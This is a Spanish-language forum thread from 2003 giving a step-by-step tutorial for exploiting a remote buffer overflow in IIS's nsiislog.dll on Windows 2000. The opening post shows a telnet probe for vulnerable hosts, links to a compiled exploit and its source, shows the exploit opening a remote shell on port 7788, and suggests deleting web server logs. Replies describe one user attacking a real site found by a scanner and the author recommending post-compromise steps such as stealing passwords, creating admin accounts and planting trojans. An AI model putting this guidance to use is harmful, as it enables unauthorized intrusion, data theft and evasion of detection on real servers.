elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Deseas probar algunas mejoras a la interfaz del foro? Prueba cake! acerca de


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Explotando el bug de buffer overflow remoto (NSIISlog.DLL)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Explotando el bug de buffer overflow remoto (NSIISlog.DLL)  (Leído 10,602 veces)
Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.535



Ver Perfil WWW
Explotando el bug de buffer overflow remoto (NSIISlog.DLL)
« en: 23 Julio 2003, 02:06 »

1.- Sistemas vulnerables
2.- Como saber si un sistema es vulnerable
3.- Creando un sistema vulnerable
4.- Consiguiendo acceso por telnet
5.- Echando un vistazo a los logs
6.- Agradecimientos y Despedida


1.- Sistemas vulnerables
^^^^^^^^^^^^^^^^^^^^

Tal y como podemos ver en la web de securityfocus[1], los sitemas vulnerables son:

Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server


2.- Como saber si un sistema es vulnerable
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Para saber si un sistema es vulnerable lo que debemos hacer es un telnet a su puerto 80 y hacer una peticion al servidor, aqui os muestro la respuesta del servidor en caso de ser y no ser vulnerable:

NOTA: Se han eliminado los tags html para facilitar la publicacion del documento.

Siendo vulnerable responderia:

SeSoX ~# telnet 192.168.0.25 80
Trying 192.168.0.25...
Connected to 192.168.0.25.
Escape character is '^]'.
GET /scripts/nsiislog.dll HTTP/1.0

        HTTP/1.1 200 OK
        Server: Microsoft-IIS/5.0
        Date: Fri, 18 Jul 2003 12:23:46 GMT
        Content-Type: text/html

        NetShow ISAPI Log Dll
        NetShow ISAPI Log Dll
        Connection closed by foreign host.



NO siendo vulnerable responderia:

        SeSoX ~# telnet 192.168.0.25 80
        Trying 192.168.0.25...
        Connected to 192.168.0.25.
        Escape character is '^]'.
        GET /scripts/nsiislog.dll HTTP/1.0

        HTTP/1.1 500 Error del servidor
        Server: Microsoft-IIS/5.0
        Date: Fri, 18 Jul 2003 12:29:02 GMT
        Content-Type: text/html
        Content-Length: 105

        Error
        No se puede encontrar el módulo especificado.
        Connection closed by foreign host.

        En caso de no ser vulnerable tambien nos podria responder con otras cosas como por ejemplo:

        Error
        %1 no es una aplicación Win32 válida.
        Connection closed by foreign host.

        Pero esto ya os lo dejo a cada uno.



3.- Creando un sistema vulnerable
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Lo que tenemos que hacer para que un sistema w2k sea vulnerable es instalar el propio windows,
el IIS y tambien el windows media services. Si vamos a hacer una instalacion nueva de w2k debemos
tener en cuenta que el windows media services no lo podemos seleccionar para que se instale en
la propia instalacion de windows (en este caso el bug no funciona) debemos instalarlo despues
desde la opcion de agregar o quitar programas. De este modo, hacemos la instalacion de windows
con el IIS y una vez echo esto, instalamos windows media services desde agregar o quitar programas,
si nos fijamos esto nos creara un fichero (NSIISLOG.DLL) dentro de la carpeta scripts del
directorio del servidor web (IIS) y una vez comprobado esto, podemos usar el paso 2 para comprobar
que realmente somos vulnerables. En caso de que no os funcione, podeis probar a reiniciar el
servidor web desde panel de control -> servicios -> Servicio de publicacion en Wordl Wide Web.


4.- Consiguiendo acceso por telnet
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Bueno, una vez localizado un servidor vulerable usando la tecnica explicada en el punto 2 debemos
usar el exploit[2] para poder conseguir una cuenta en el sistema, lo que debemos hacer es lo
siguiente:


        C:>nsiislog 192.168.0.25

        C:>telnet 192.168.0.25 7788

        Microsoft Windows 2000 [Versi¢n 5.00.2195]
        (C) Copyright 1985-1999 Microsoft Corp.

        C:WINNTsystem32>

Ya tenemos acceso al sistema!!!!!!!!!!!! ahora deja volar tu imaginacion };)
Podemos usar tftp para subir ficheros al servidor y si somos un poco paranoicos
pasarnos por el directorio c:\winnt\system32\logfiles\w3svc1\ para borrar los logs.


5.- Echando un vistazo a los logs
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Revisando un poco los logs que deja este ataque, podemos ver algo como lo siguiente:

Fichero: C:\WINNT\system32\LogFiles\W3SVC1\ex030718.log

        2003-07-18 12:45:02 192.168.0.25 - 192.168.0.25 80 POST /scripts/nsiislog.dll - 500 -

En el caso del test para saber si el sistema es o no vulnerable el log seria:

        2003-07-18 12:32:24 192.168.0.25 - 192.168.0.25 80 GET /scripts/nsiislog.dll - 500 -


5.- Agradecimientos y Despedida
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^

Agradecer a ASzY la revicion de este documento, a toda la peña que me ha ayudado cuando lo
he necesitado y a toda la gente que escribe textos como este para enseñar cosillas a los demas.

Si os surge cualquier duda, encontrais algun fallo o quereis añadir algo en este texto, no dudeis
en escribirme a (sesox at govannom dot org) por que estare encantado de leer vuestros correos.

Que tengais una divertida y productiva caza!!!! ;)

[1]  http://www.securityfocus.com/bid/8035
[2]  http://www.terra.es/personal6/robesan/nsiislog.exe
     http://www.terra.es/personal6/robesan/xfocus-nsiislog.c

Mas informacion:

http://www.terra.es/personal6/robesan/IIS_Media.pdf
http://www.derkeiler.com/Mailing-Lists/NT-Bugtraq/2003-07/0014.html
http://rynhozeros.com.ar/article478.html
http://www.vsantivirus.com/vulms03-022.htm
http://www.vsantivirus.com/vulms03-019.htm

Tambien podeis consultar este texto en la sección de seguridad de www.govannom.org.
------------------------------------------------------------

Nota del Moderador:  Vi el enlace en www.cyruxnet.com.ar, y este articulo es el link:
http://www.govannom.org/modules.php?name=News&file=article&sid=55

Me parecio muy interesante el que se publique aki... Ya estoy revisando el codigo C del exploit  8)
En línea

Zakt


Desconectado Desconectado

Mensajes: 625


Mi reino no es de este mundo


Ver Perfil
Re:Explotando el bug de buffer overflow remoto (NSIISlog.DLL)
« Respuesta #1 en: 23 Julio 2003, 03:30 »

Gracias por la información. Me parece de mucha utilidad.

Saludos.
En línea

BASIC CAOS


Desconectado Desconectado

Mensajes: 366


Ver Perfil
Re:Explotando el bug de buffer overflow remoto (NSIISlog.DLL)
« Respuesta #2 en: 23 Julio 2003, 07:06 »

Esta demas decirte Gracias Rodojos

Salu2
En línea

EL_ZoRRo

Desconectado Desconectado

Mensajes: 234



Ver Perfil
Re:Explotando el bug de buffer overflow remoto (NSIISlog.DLL)
« Respuesta #3 en: 23 Julio 2003, 10:40 »

Muy  buena info, siempre nos sorprendes.
Gracias
Un Saludo
En línea

Kerber0

Desconectado Desconectado

Mensajes: 142

Yo me Amo!


Ver Perfil
Re:Explotando el bug de buffer overflow remoto (NSIISlog.DLL)
« Respuesta #4 en: 23 Julio 2003, 15:40 »

Buenas...

Un amigo mio hizo un scanner para este bug, encontre un sitio vulnerable.. me baje el exploit ya compilado [http://www.terra.es/personal6/robesan/nsiislog.exe]
ejecuto el command, typeo C:>nsiislog hostvulnerable .. luego abro una conexion al sitio vulnerable en el puerto 7788 y no me conecta....

que puede ser que haga mal ??
En línea

Kerber0

Desconectado Desconectado

Mensajes: 142

Yo me Amo!


Ver Perfil
Re:Explotando el bug de buffer overflow remoto (NSIISlog.DLL)
« Respuesta #5 en: 29 Julio 2003, 15:43 »

Rojodos, una vez que ya he tenido acceso al sistema, que puedo hacer ? .. subir archivos mediante ftp, algun manual ? lei como subir pero mediante el unicode... es lo mismo..
El que sepa algo, que me lo diga ..  ::)
En línea

Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.535



Ver Perfil WWW
Re:Explotando el bug de buffer overflow remoto (NSIISlog.DLL)
« Respuesta #6 en: 30 Julio 2003, 00:12 »

Imaginate todo lo que puedes hacer desde tu MSDOS... pos lo mismo, en el suyo...

Si, para subir archivos, ejecutas FTP, y ya lo tipico, conectas al servidor donde tengas los archivos, los descargas, los ejecutas, etc...

Una vez con la shell, puedes buscar bases de datos, passwords, hacerte una cuenta de admin, troyanizar, instalar un bouncer, etc etc etc...

Pero lo que no debes (salvo que veas que tiene pornografia infantil o cosas asi) es destruir y borrar cosas....
En línea

Noobyz

Desconectado Desconectado

Mensajes: 7



Ver Perfil
Re:Explotando el bug de buffer overflow remoto (NSIISlog.DLL)
« Respuesta #7 en: 16 Agosto 2003, 18:47 »

Hola estoy de francia y entoce no habla perfectamente español  :-[ he visto vuestras foros i esta muy muy muy bien y pienso que tengo cosas a ponner dentro pero tengo un problemo con este exploit lo he compilado y el tuyo cuando hago c:\nsiislog.exe me da Connect Failed.Error:10049 solamente no me da nada d'otro ni argumentos o no puedo poner des ips en toce no se lo que va :(((  gracias por sus respuestas
En línea

Creature


Desconectado Desconectado

Mensajes: 1.772


Mitad bohemio, mitad caballero


Ver Perfil WWW
Re:Explotando el bug de buffer overflow remoto (NSIISlog.DLL)
« Respuesta #8 en: 16 Agosto 2003, 23:58 »

Hola,

Tienes que ejecutarlo desde tu consola MS-DOS o Simbolo del Sistema.

Si intentas abrirlo como ventana no funciona, es un programa para consola.
En línea

Toma mi mano sigueme, te mostrare lo que tu alma no ve!
por equipaje solo lleva tu fé, por escudero el valor sieempree teen!
Noobyz

Desconectado Desconectado

Mensajes: 7



Ver Perfil
Re:Explotando el bug de buffer overflow remoto (NSIISlog.DLL)
« Respuesta #9 en: 17 Agosto 2003, 02:23 »

lol gracias pero no soy tan malo :D es echo como todo el tiempo demarrer o startup para los ingles y cmd despues cd c:\**\ y nsiislog.dll :) gracias por tu respuesta :)
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Explotando XSS desde el Header Referer IE 6,7,8
Hacking Avanzado
Preth00nker 1 1,813 Último mensaje 14 Noviembre 2011, 22:45
por adastra
Problemas explotando un Worpress
Nivel Web
Debci 2 2,033 Último mensaje 20 Abril 2013, 21:21
por Debci
Explotando [OJS]..
Hacking Avanzado
Søra 0 842 Último mensaje 30 Junio 2013, 18:00
por Søra
Explotando un Integer Overflow
Bugs y Exploits
integeroverflow 6 944 Último mensaje 24 Febrero 2017, 03:27
por integeroverflow
Explotando un Buffer Overflow
Bugs y Exploits
desbordebuffer 1 592 Último mensaje 12 Agosto 2017, 20:36
por charlymd
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines